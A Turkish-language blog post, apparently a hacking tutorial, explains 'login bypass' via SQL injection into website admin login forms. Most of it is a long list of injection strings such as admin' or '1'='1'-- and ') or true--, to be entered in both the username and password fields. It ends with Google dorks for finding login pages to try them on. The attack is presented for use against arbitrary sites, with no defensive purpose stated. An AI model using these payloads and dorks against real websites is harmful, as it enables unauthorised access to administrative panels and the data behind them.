Login bypass

 Merhabalar konumuz login bypass. Öncelikle login bypass bir sql çeşidir.

Login bypass hedef sitenin /admin paneline yetkili olarak giriş yapmamızı sağlıyor.

örnek resimde gördüğümüz gibi sitenin paneli neyse örnek /admin /panel /setup /yonetici /administrator/yonetim vs. sık kullanılan admin panelleridir.

admin ve şifreye ;

Aşağıdaki kodlardan herhangi birini deniyerek giriş yapmayı deneyebiliriz. Bu kodlar çoğaltılabilir.

kullanıcı adı ve şifeye aynı kodu yazıyoruz arkadaşlar
kullanıcı acına ' or ''=' yazdıysak şifreyede aynısını yazıyoruz.
'1'='1
admin' or '1'='1
' or ''='
'or'1'='1 (güncel)
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*


' or true--
') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
'+'
'&'
'^'
'*'
' or ''-'
' or ''+'
' or ''&'
' or ''^'
' or ''*'
"-"
"+"
"&"
"^"
"*"
" or ""-"
" or ""+"
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

Denemeniz için bazı dorklar;inurl:administrator.asp 
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:login.php
inurl:login.asp
inurl:login.aspx

2 yorum: